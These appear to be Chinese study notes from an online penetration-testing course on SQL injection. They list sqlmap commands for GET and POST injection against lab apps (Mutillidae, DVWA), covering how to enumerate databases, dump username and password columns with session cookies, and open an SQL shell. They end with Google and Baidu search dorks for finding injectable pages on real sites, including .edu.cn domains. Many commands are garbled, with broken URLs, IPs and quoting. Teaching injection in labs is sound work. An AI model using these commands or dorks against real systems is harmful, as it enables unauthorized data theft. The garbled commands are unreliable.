SQL 注入攻击_7 | 学习笔记

开发者学堂课程【网络安全攻防 - Web渗透测试：SQL 注入攻击_7】学习笔记，与课程紧密联系，让用户快速学习知识。

课程地址：https://developer.aliyun.com/learning/course/630/detail/9910

SQL 注入攻击_7

内容介绍

一、  GET 方法注入

二、  POST 方法注入

三、  数据获取

四、  提权操作

五、  综合实例

一、  GET 方法注入

1.  //获取所有数据库

rootekali:~#sqlmap-u "http://192.168.106.134/mutillidae/index.php?page=user-

info.php&username-yangge&password-1238user-info-php-submit-button-=View+Account+Details"-dbs

2.  //获得所有用户

root@kali:~#sqlmap-u“http://192.168.106.134/mutillidae/index.php?page=user-

info.php&username-yangge&password-123&user-info-php-submit-button=View+Account+Details”--us

3.  //获得当前用户

root@kali:-# sqlmap -u "http://192.168.106.134/mutillidae/index .php?page=user-info.php&username=yangge&password-123&user-info-php-submit-button=View-Account+Details”current-user

4. sqlmap 参数解析

--users

--current-user

--dbs

--current -db

-D "database_name"  --tables

-D “database_name"-T "table_name”--columns

--dump-all

--dump-all --exclude-sysdbs

-D “database name"-T "table_name"--dump

-D "database name"--tables

-D “database_name"-T "table_name"--columns

--batch   //自动化完成

5. 示例步骤：

1) 获得当前数据库

root@kali:# sqlmap -u “http://192.168.106.134/mutillidae/index.php?page=use-info.php?username=yangge&password=1238user-info-php-submit-button=

View+Account+Details”\--batch--current-db

2) 获得数据库表

root@kali:~# sqlmap -u “http://192.168.106.134/mutillidae/index php?page-user-info.php&username=yangge&password=123&user-info-php-submit-button=View+Account +Details”\--batch -D nowasp --tables

1)  获得表的字段

root@kali:~# sqlmap -u”http://192.168134/mutillidae/index.php?page-user-info.php&username=eee&password info-php-submit-button=View+Account+Detalls”

--batch -D nowasp -T accounts --columns

2)  获得表中的数据

root@kali:~# sqlmap -u"http://192.168.166.134/mut1llidae/index.php?page-user-info.php&username-eee&password=eee&user-info-php-submit-button=View+Account+Details--batch -D nowasp -T accounts -C "username, password" --dump

二、  POST 方法注入

1.  需要带 cookie 才能访问的注入页面，--cookie=””

root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id=18Submit=Submit#\--cookie-“PHPSESSID-10jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids-swingset,jotto,phpbb2,rednine;acgroupswithpersist-nada"--batch

2. root@kali:~# sqlmap -u“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#”\--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -p id

1.  root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch --users

2.  root@kali:~# sqlmap -u“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie="PHPSESSID-i0jcqf4uhd68qujcof3n322e95;securitylow;showhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada"--batch --current-user

三、  数据获取

1. --users

--current -user

--dbs

--current-db

-D “database_name”--tables

-D “database name” -T "table name"--columns

--dump-all

--dump-all --exclude-sysdbs

-D "database_name"-T "table_name”-C"usernane, password”--dump

2.  root@kali：~# sqlmap -u

“http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-low;

showhints=1;acopendivids=swingset,jotto,phpbb2,redmine;acgro thpersist-nada” --batchusers

3.  root@kali:~# sqlmap -u "http://92.168.106.134/6

ea ilities/sqli/?id-18Submit-Submit#”--cookie="PHPSESSID=10jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada”-- batch --current-db

4. root@kali:~# sqlmap

-u"httpi//192.168.106.134/dvwa/vulnerabilities/sq11/?id=18Submit-Submit#”-cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1；\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D “dvwa”--tables

5. root@kali:~# sqlmap  

-u"http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-1&Submit-Submit#"cookie="PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-1ow;showhint5-1；\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D "dvwa"-T"users”--columns

6. root@kali:~# sqlmap -u

"http://192.168.106.134/dvwa/vulnerabilities/sq11/?1d-185ubmit-Submdtcookie-"PHPSESSID-10jcqf4uhd68qujcof3n322e95;security-low; showhints

acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D "dvwa" -T users" -C "username,password"--dump

7. root@kali:~# sqlmap -u  

“http://192.168.106.134/dvwa/vulnerabilities/sq1i/?1d-185ubmit=Submit#”-cookie=”PHPSESSID=i0jcqf4uhd68qujcof3n322e95;secunitv=low:showhints=1;\

acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D”dvwa” -T “users"--dump

四、  提权操作

//与数据库交互--sql-shell

rootfkali:~# sqlmap -u http://192.168.106.134/dvwa/vuinerabilities/sqli/?id=1&Submit=Submit#-cookie="PHPSES5ID=i0jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\

acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --batch --sql--shell

五、  综合实例

1.  通过 Google 搜索可能存在注入的页面

inurl:.php?id

inurl:.jsp?id

inurl:.asp?id=

inurl:/admin/login.php

inurl:.php?id- intitle:美女

2.  通过百度搜索可能存在注入的页面

inurl:news.asp?id= site:edu.cn

inurl:news.php?id= site;edu.cn

inurl:news.aspx?id= site;edu.cn